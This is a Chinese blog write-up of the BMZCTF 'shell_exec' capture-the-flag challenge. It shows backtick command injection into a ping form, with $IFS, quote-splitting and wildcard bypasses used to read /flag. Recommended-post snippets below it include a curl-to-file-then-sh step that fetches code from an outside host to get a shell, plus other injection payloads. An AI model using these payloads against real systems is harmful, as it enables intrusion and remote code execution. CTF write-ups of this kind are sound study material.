BMZCTF:shell_exec

最新推荐文章于 2023-12-19 20:02:01 发布
最新推荐文章于 2023-12-19 20:02:01 发布
阅读量895 收藏 6
点赞数 1
分类专栏: CTF_WEB_Writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/113084251
版权 
http://bmzclub.cn/challenges#shell_exec

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
命令执行绕过

ping -c 2 "$_POST[ip]" 2>&1

2>&1是将标准出错重定向到标准输出,也是就是我们直接在ip位置传入命令是没有回显的,需要在这个位置定义一个标准输出文件即以下这种形式

ping -c 2 "command>1.txt" 2>&1

fuzz一下发现同时还过滤了很多关键字符,但是发现没有过滤反引号,即可构造

`ls>1.txt`

在这里插入图片描述
然后访问1.txt发现成功将执行结果输出到了这个文件
在这里插入图片描述
查看根目录,空格被过滤了使用$IFS代替

`ls$IFS/>1.txt`

在这里插入图片描述
读取flag文件,cat被过滤,但是可以用ca''t这种方法绕过,flag关键字也被过滤,用通配符?代替

`ca''t$IFS/fla?>1.txt`

在这里插入图片描述

末 初
关注
专栏目录
CTF-shell_exec-Wp
qq_28545703的博客
10-29 1490
CTF-shell_exec-Wp 题目是这样的,ping命令测试 查看html源代码看到一个tip 解题过程一 经过大量测试目的其实就是执行cat /flag 但是发现有过滤了空格,这里我们$IFS$9代替 我是利用echo curl http://xxxxx.com/1.php >a ,然后执行sh a这样拿shell的,需要绕过php 最终poc: #第一条,把vps的<?php system('cat /flag')>写进去a `echo$IFS$9curl$IFS$9112h
PHP中exec函数和shell_exec函数的区别
12-19
这两个函数都是执行Linux命令函数,不同的是获取返回结果不一样,exec只能获取最后一行数据,shell_execu则可以获取全部数据。 假如脚本路径下有如下文件: 复制代码 代码如下: -bash-4.1# ll 总用量 12 -rw-rw-r–. 1 www web 133  7月 16 15:00 a.php -rw-r–r–. 1 lee web  59  2月 29 17:05 b.php -rw-r–r–. 1 lee web  81  3月  8 17:00 c.php exec例子 复制代码 代码如下: <?php /**  * execshell_exec的区别  * 琼
CTF——远程代码执行漏洞的利用与绕过
weixin_51735061的博客
03-10 4610
CTF——远程代码执行漏洞的利用与绕过 RCE远程代码执行是一种常见的攻击方法,通过一些特定的函数方法来达到远程执行漏洞。比如说PHP的system,exec,shell_exec,nodejs的eval等。开发者不小心将这些函数公开出来以实现某种服务,而用户的数据不施加任何的过滤的话就很容易形成此漏洞。 敏感函数 系统指令执行的敏感函数 system()、exec()、shell_exec()、passthru()、pctnl_exec()、 popen()、proc_open() 能够进行代码注入的敏
BMZCTF shell_exec
qq_26243045的博客
11-28 495
考点:命令执行 打开题目能猜出来是考命令执行。 做了半天发现底部有个语法提示。 过滤了很多命令,但是head还可以执行。用在取反符号中写入命令,完整payload `head$IFS$9/fla?$IFS$9>1.txt` 拿到flag ...
BMZCTF:easy_exec
末初的CSDN博客
02-07 573
http://bmzclub.cn/challenges#easy_exec 查看源码也没发现什么,尝试目录扫描 发现有个index.html,访问查看源码,发现de.php 这题我看搞不懂搞两个正则匹配在这干啥,又没有起到过滤作用,直接双引号闭合,然后执行命令 ?comm1=/flag";cat /flag;"&comm2=/etc/passwd ...
Exec CTF题目
weixin_44971601的博客
09-29 397
BUUCTF命令执行漏洞题目
[BMZCTF]-easy_exec
cjdgg的博客
05-23 224
[BMZCTF]-easy_exec 题目直接给出源代码,看这样子,应该又是绕过过滤然后命令执行 这道题先搜一搜file命令的作用,并查看相关参数的作用后,确定file没用后,确定了这题考点应该是要插入我们想要执行的命令 这里看了一下,把反引号和单引号都过滤了,但是却没过滤双引号,偏偏双引号还是这题用来框住命令的 直接构造";cat%20/flag",这两个双引号分别用来闭合题目中的双引号。 成功拿到flag ...
PHP 命令行工具 shell_exec, exec, passthru, system详细使用介绍
01-20
shell_exec() shell_exec() 命令行实际上仅是反撇号 (`) 操作符的变体。如果您编写过 shell 或 Perl 脚本,您就知道可以在反撇号操作符内部捕捉其他命令的输出。例如,清单 1 显示了如何使用反撇号...
解决Windows下PHP的execshell_exec等函数不能正常运行的方法
02-11
首先,我们要理解`exec`和`shell_exec`这些函数的工作原理。它们都是PHP提供的用于在服务器上执行外部程序或命令行脚本的函数。在Windows系统中,这些函数通常依赖于`cmd.exe`(命令提示符)来运行外部程序。当PHP...
sh-exec::laptop_computer:使用`Templateliterals`编写shell脚本使:red_heart_selector:开心
02-05
使用Template literals编写使脚本变得快乐的shell脚本 :red_heart_selector: 。 安装 $ yarn add sh-exec 例子 import sh from 'sh-exec' import { version } from '../package.json' sh ` echo "sh-exec is ...
BMZCTF WEB easy_exec
Crazy198410的博客
01-25 674
打开页面: 显示:no file 查看源码: 发现新的页面de.php,打开: 可以看到源码 要我们输入两个参数,最后与file拼接,再执行。 知道原理后,开始分析代码: <?php highlight_file(__FILE__); $comm1 = $_GET['comm1']; #输入第一个参数 $comm2 = $_GET['comm2']; #输入第二个参数 if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|.
i春秋——“百度杯”CTF比赛 十月场——EXEC(命令执行、带外通道传输数据)...
weixin_30292843的博客
10-14 503
查看源码得知由vim编写,所以查找备份以及交换文件 找到 /.index.php.swp ,下载后用vim -r恢复该文件即可得到源码 1 <html> 2 <head> 3 <title>blind cmd exec</title> 4 <meta language='utf-8' editor='vim'...
百度杯CTF比赛 十月场-------EXEC
大方子
08-30 2708
=============================== 个人收获 1.命令盲注 2.vim文件泄露 3.nc的使用   ================================   题目:   查看源码出现这个,猜测为vim文件泄露 再浏览器输入.index.php.swp果然出现下载连接   我们把下载来的文件用 vim打开 vim -r ...
php exec ctf,从一道CTF题目谈PHP中的命令执行
weixin_42365490的博客
03-17 933
answer = "phpinfo"tmp1,tmp2 = '', ''forc inanswer:fori invalid:forj invalid:if(ord(i)^ord(j) == ord(c)):tmp1 += itmp2 += jbreakelse:continuebreakprint(tmp1,tmp2)其中valid是可用的字符,answer是我们需要构造的字符串。那么我们得到了...
“百度杯”CTF比赛 十月场 EXEC
feng的博客
10-27 640
WP 首先进入环境,有两种方式得到源码。一种是直接dirsearch扫,扫出存在.index.php.swp,第二种是f12看源码,发现: 暗示可能存在vim源码泄露,也能猜到.index.php.swp。 下载下面,vim -r index.php.swp,就可以复原文件,得到index.php的源码: <?php /* flag in flag233.php */ function check($number) { $one = ord('1'); $nine = ord('9'
CTF学习笔记——Knife&Exec
Obs_cure的博客
10-31 615
一、[极客大挑战 2019]Knife 1.题目 2.解题步骤 乍一看题目中的代码,提示是菜刀,于是用蚁剑连接一下。 3.总结 4.参考资料
CTF】命令执行RCE
qq_53099119的博客
04-02 3017
md5() 函数计算字符串的 MD5 散列。md5() 函数使用 RSA 数据安全,包括 MD5 报文摘要算法。来自 RFC 1321 的解释 - MD5 报文摘要算法:MD5 报文摘要算法将任意长度的信息作为输入值,并将其换算成一个 128 位长度的"指纹信息"或"报文摘要"值来代表这个输入值,并以换算后的值作为结果。MD5 算法主要是为数字签名应用程序而设计的;
CTF命令执行部分总结
最新发布
weixin_44770698的博客
12-19 348
CTF命令执行
[ACTF2020 新生赛]Exec
siu~
08-28 725
[ACTF2020 新生赛]Exec 解题
PHP命令行工具:shell_exec, exec, passthru, system详解
shell_exec()通过shell运行外部程序并返回结果字符串,类似于shell脚本中的反撇号操作。" 在PHP开发中,有时候需要利用操作系统提供的功能来执行一些任务,比如处理文件、统计信息等。此时,PHP提供了几个命令行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末 初

谢谢老板!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值